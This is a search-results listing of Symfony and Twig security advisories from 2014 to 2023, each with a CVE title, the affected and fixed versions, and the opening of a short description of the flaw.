76 matches found
CVE-2023-46734: Potential XSS vulnerabilities in CodeExtension filters
Affected versions Symfony versions =2.0.0,4.4.51, =5.0.0,5.4.31, and =6.0.0,6.3.8 of the Symfony Twig Bridge are affected by this security issue. The issue has been fixed in Symfony 4.4.51, 5.4.31, 6.3.8. All other versions are not maintained anymore. Description Some filters in the CodeExtension...
CVE-2023-46735: Potential XSS in WebhookController
Affected versions Symfony versions =6.3.0, 6.3.8 of the Symfony Webhook component are affected by this security issue. The issue has been fixed in Symfony 6.3.8. Description The error message in WebhookController returns unescaped user-submitted input. Resolution WebhookController now doesn't...
CVE-2023-46733: Possible session fixation
Affected versions Symfony versions =5.4.21, 5.4.31, and = 6.2.7, 6.3.8 of the Symfony Security HTTP component are affected by this security issue. The issue has been fixed in Symfony 5.4.31, 6.3.8. Description SessionStrategyListener does not always migrate the session after a successful login. I...
CVE-2023-41336: symfony/ux-autocomplete Prevent injection of invalid entity ids for "autocomplete" fields
Affected Versions Versions 2.11.1 are of the symfony/ux-autocomplete package are affected by this security issue. Description Under certain circumstances, an attacker could successfully submit an entity id for an EntityType that is not part of the valid choices. Affected applications are any that...
CVE-2022-24895: CSRF token fixation
Affected versions Symfony versions =2.0.0, 4.4.50, = 5.0.0, 5.4.20, = 6.0.0, 6.0.20, = 6.1.0, 6.1.12, and = 6.2.0, 6.2.6 of the Symfony Security Bundle are affected by this security issue. The issue has been fixed in Symfony 4.4.50, 5.4.20, 6.0.20, 6.1.12, and 6.2.6. All other versions are not...
CVE-2022-24894: Prevent storing cookie headers in HttpCache
Affected versions Symfony versions =2.0.0, 4.4.50, = 5.0.0, 5.4.20, = 6.0.0, 6.0.20, = 6.1.0, 6.1.12, and = 6.2.0, 6.2.6 of the Symfony Security Bundle are affected by this security issue. The issue has been fixed in Symfony 4.4.50, 5.4.20, 6.0.20, 6.1.12, and 6.2.6. All other versions are not...
CVE-2022-23601: CSRF token missing in forms
Affected versions Symfony 5.3.14, 5.4.3, and 6.0.3 versions of the Symfony Framework Bundle is affected by this security issue. The issue has been fixed in Symfony 5.3.15, 5.4.4, and 6.0.4. Description The Symfony form component provides a CSRF protection mechanism by using a random token injecte...
CVE-2021-41267: Webcache Poisoning via X-Forwarded-Prefix and sub-request
Description When a Symfony application is running behind a proxy or a load-balancer, you can tell Symfony to look for the X-Forwarded- HTTP headers. HTTP headers that are not part of the "trustedheaders" allowed list are ignored and protect you from "Cache poisoning" attacks. In Symfony 5.2, we'v...
CVE-2021-41268: Remember me cookie persistance after password changes
Description Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes its password. Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a...
CVE-2021-41270: Prevent CSV Injection via formulas
Description CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with = is interpreted by the software as a formula and could be abused by an attacker. In Symfony 4.1, we've added the...
CVE-2021-32693: Authentication granted to all firewalls instead of just one
Affected versions Symfony = 5.3.0, 5.3.2 versions of the Symfony Security HTTP component is affected by this security issue. The issue has been fixed in Symfony 5.3.2. Description When an application defines multiple firewalls, the authenticated token delivered by one of the firewalls is availabl...
CVE-2021-21424: Prevent user enumeration in authentication mechanisms
Affected versions Symfony =2.8.0, 3.4.49 | = 5.0.0, 5.2.9 versions of the Symfony Security, Security Guard, Security Core, and Security HTTP components are affected by this security issue. The issue has been fixed in Symfony 3.4.49, 4.4.24, 5.2.9, and 5.3.0 RC1. All other affected minor versions ...
CVE-2020-15094: Prevent RCE when calling untrusted remote with CachingHttpClient
Affected versions Symfony 4.3, 4.4.0 to 4.4.12, 5.0, and 5.1.0 to 5.1.4 versions of the Symfony HttpClient component are affected by this security issue. The issue has been fixed in Symfony 4.4.13 and 5.1.5. Symfony 4.3 and 5.0 won't be patched as they are not maintained anymore. Description The...
CVE-2020-5255: Prevent cache poisoning via a Response Content-Type header
Affected versions Symfony 4.4.0 to 4.4.6 and 5.0.0 to 5.0.6 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 4.4.7 and 5.0.7. Description When a Response does not contain a Content-Type header, Symfony falls back to the form...
CVE-2020-5275: All "access_control" rules are required when a firewall uses the unanimous strategy
Affected versions Symfony 4.4.0 to 4.4.6 and 5.0.0 to 5.0.6 versions of the Symfony ErrorHandler component are affected by this security issue. The issue has been fixed in Symfony 4.4.7 and 5.0.7. Description On Symfony before 4.4.0, when a Firewall checks an access control rule using the unanimo...
CVE-2020-5274: Fix Exception message escaping rendered by ErrorHandler
Affected versions Symfony 4.4.0 to 4.4.3 and 5.0.0 to 5.0.4 versions of the Symfony ErrorHandler component are affected by this security issue. The issue has been fixed in Symfony 4.4.4 and 5.0.4. Description When ErrorHandler renders an exception HTML page, it uses un-escaped properties from the...
CVE-2019-18887: Use constant time comparison in UriSigner
Affected versions Symfony 2.8.0 to 2.8.51, 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony HttpKernel component are affected by this security issue. The issue has been fixed in Symfony 2.8.52, 3.4.35, 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 3.0,...
CVE-2019-18889: Forbid serializing AbstractAdapter and TagAwareAdapter instances
Affected versions Symfony 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony Cache component are affected by this security issue. The issue has been fixed in Symfony 3.4.35, 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 3.1, 3.2, 3.3, 4.0 and 4.1 as they a...
CVE-2019-11325: Fix escaping of strings in VarExporter
Affected versions Symfony 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony VarExporter component are affected by this security issue. The issue has been fixed in Symfony 4.2.12 and 4.3.8. Description Some strings were not properly escaped when being dumped by the VarExporter component...
CVE-2019-18888: Prevent argument injection in a MimeTypeGuesser
Affected versions Symfony 2.8.0 to 2.8.51, 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony HttpFoundation component are affected by this security issue. Symfony 4.3.0 to 4.3.7 versions of the Symfony Mime component are affected by this security issue. The issue has bee...
CVE-2019-18886: Prevent user enumeration using switch user functionality
Affected versions Symfony 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony Security/Http component are affected by this security issue. The issue has been fixed in Symfony 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 4.1 as they are not maintained anymore. Description T...
CVE-2019-10912: Prevent destructors with side-effects from being unserialized
Affected versions Symfony 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony Cache component are affected by this security issue. The issue has been fixed in Symfony 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are provided for Symfony 3.0, 3.1,...
CVE-2019-10910: Check service IDs are valid
Affected versions Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony Dependency Injection component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no...
CVE-2019-10913: Reject invalid HTTP method overrides
Affected versions Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes ar...
CVE-2019-10909: Escape validation messages in the PHP templating engine
Affected versions Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of Symfony Framework Bundle templating are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are...
CVE-2019-10911: Add a separator in the remember me cookie hash
Affected versions Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are provided...
Twig: Sandbox Information Disclosure
Affected versions Twig 1.0.0 to 1.37.1 and 2.0.0 to 2.6.2 are affected by this security issue. The issue has been fixed in Twig 1.38.0 and 2.7.0. Description This vulnerability affects the sandbox mode of Twig. If you are not using the sandbox, your code is not affected. Twig allows the evaluatio...
CVE-2018-19790: Open Redirect Vulnerability when using Security\Http
Affected versions Symfony 2.7.0 to 2.7.49, 2.8.0 to 2.8.48, 3.0.0 to 3.4.19, 4.0.0 to 4.0.14, 4.1.0 to 4.1.8 and 4.2.0 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.50, 2.8.49, 3.4.20, 4.0.15, 4.1.9 and 4.2.1. Note that no fixe...
CVE-2018-19789: Disclosure of uploaded files full path
Affected versions Symfony 2.7.0 to 2.7.49, 2.8.0 to 2.8.48, 3.0.0 to 3.4.19, 4.0.0 to 4.0.14, 4.1.0 to 4.1.8 and 4.2.0 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.50, 2.8.49, 3.4.20, 4.0.15, 4.1.9 and 4.2.1. Note that no fixe...
CVE-2018-14774: Possible host header injection when using HttpCache
Affected versions Symfony 2.7.0 to 2.7.48, 2.8.0 to 2.8.43, 3.3.0 to 3.3.17, 3.4.0 to 3.4.13, 4.0.0 to 4.0.13, and 4.1.0 to 4.1.2 versions of the Symfony HttpKernel component are affected by this security issue. The issue has been fixed in Symfony 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3...
CVE-2018-14773: Remove support for legacy and risky HTTP headers
Affected versions Symfony 2.7.0 to 2.7.48, 2.8.0 to 2.8.43, 3.3.0 to 3.3.17, 3.4.0 to 3.4.13, 4.0.0 to 4.0.13 and 4.1.0 to 4.1.2 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and...
CVE-2018-11386: Denial of service when using PDOSessionHandler
Affected versions Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony http-foundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also...
CVE-2018-11385: Session Fixation Issue for Guard Authentication
Affected versions Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10 and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. Note that no fixes are...
CVE-2018-11408: Open redirect vulnerability on security handlers
Affected versions Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also been fix...
CVE-2018-11407: Unauthorized access on a misconfigured LDAP server when using an empty password
Affected versions Symfony 2.8.0 to 2.8.36, 3.3.0 to 3.3.16, 3.4.0 to 3.4.6, and 4.0.0 to 4.0.6 versions of the Symfony LDAP component are affected by this security issue. The issue has been fixed in Symfony 2.8.37, 3.3.17, 3.4.7, and 4.0.7. 4.1.0 has also been fixed before its final release. Note...
CVE-2018-11406: CSRF Token Fixation
Affected versions Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also been fix...
CVE-2017-16653: CSRF protection does not use different tokens for HTTP and HTTPS
Affected versions Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are...
CVE-2017-16652: Open redirect vulnerability on security handlers
Affected versions Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are...
CVE-2017-16654: Intl bundle readers breaking out of paths
Affected versions Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Intl component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are provide...
CVE-2017-16790: Ensure that submitted data are uploaded files
Affected versions Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are provide...
CVE-2017-11365: Empty passwords validation issue
Affected versions Symfony 2.7.30, 2.7.31, 2.8.23, 2.8.24, 3.2.10, 3.2.11, 3.3.3, and 3.3.4 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.32, 2.8.25, 3.2.12, and 3.3.5. Description When fixing issue 23319 with 23341, we...
CVE-2016-4423: Large username storage in session
Affected Versions Symfony 2.3.0 to 2.3.40, 2.7.0 to 2.7.12, 2.8.0 to 2.8.5, and 3.0.0 to 3.0.5 versions of the Security component are affected by this security issue when using the username/password form authentication listener and its simpler version SimpleFormAuthenticationListener. This issue...
CVE-2016-2403: Unauthorized access on a misconfigured Ldap server when using an empty password
Affected versions Symfony 2.8.0 to 2.8.5 and 3.0.0 to 3.0.5 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.8.6 and 3.0.6. Description The bind operation of LDAP, as described in RFC 4513, provides a method which allows for...
CVE-2016-1902: SecureRandom's fallback not secure when OpenSSL fails
Affected Versions Symfony 2.3.0 to 2.3.36, 2.6.0 to 2.6.12, 2.7.0 to 2.7.8 versions of the Security component are affected by this security issue when used with PHP 5.x without the paragonie/randomcompat library listed in your Composer dependencies. Projects using PHP 7 are not affected. This iss...
CVE-2015-8125: Potential Remote Timing Attack Vulnerability in Security Remember-Me Service
Affected Versions Symfony 2.3.0 to 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6 versions of the Security component are affected by this security issue. This issue has been fixed in Symfony 2.3.35, 2.6.12, and 2.7.7. Note that no fixes are provided for Symfony 2.4 and 2.5 as they are not maintained...
CVE-2015-8124: Session Fixation in the "Remember Me" Login Feature
Affected Versions Symfony 2.3.0 to 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6 versions of the Security component are affected by this security issue. This issue has been fixed in Symfony 2.3.35, 2.6.12, and 2.7.7. Note that no fixes are provided for Symfony 2.4 and 2.5 as they are not maintained...
CVE-2015-4050: ESI unauthorized access
Affected Versions 2.3.19 - 2.3.28, 2.4.9 - 2.4.10, 2.5.4 - 2.5.11, 2.6.0 - 2.6.7 versions of the Symfony HttpKernel component are affected by this security issue. This issue has been fixed in Symfony 2.3.29, 2.5.12, and 2.6.8. Note that no fixes are provided for Symfony 2.4 as it's not maintained...
CVE-2015-2308: Esi Code Injection
Affected Versions All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, 2.5.X, and 2.6.X versions of the Symfony HttpKernel component are affected by this security issue. This issue has been fixed in Symfony 2.3.27, 2.5.11, and 2.6.6. Note that no fixes are provided for Symfony 2.0, 2.1, 2.2, and 2.4 as they ar...
CVE-2015-2309: Unsafe methods in the Request class
Affected Versions All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, 2.5.X, and 2.6.X versions of the Symfony HttpFoundation component are affected by this security issue. This issue has been fixed in Symfony 2.3.27, 2.5.11, and 2.6.6. Note that no fixes are provided for Symfony 2.0, 2.1, 2.2, and 2.4 as the...
CVE-2014-5244: Denial of service with a malicious HTTP Host header
Affected Versions All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, and 2.5.X versions of the Symfony HttpFoundation component are affected by this security issue. This issue has been fixed in Symfony 2.3.19, 2.4.9, and 2.5.4. Note that no fixes are provided for Symfony 2.0, 2.1, and 2.2 as they are not...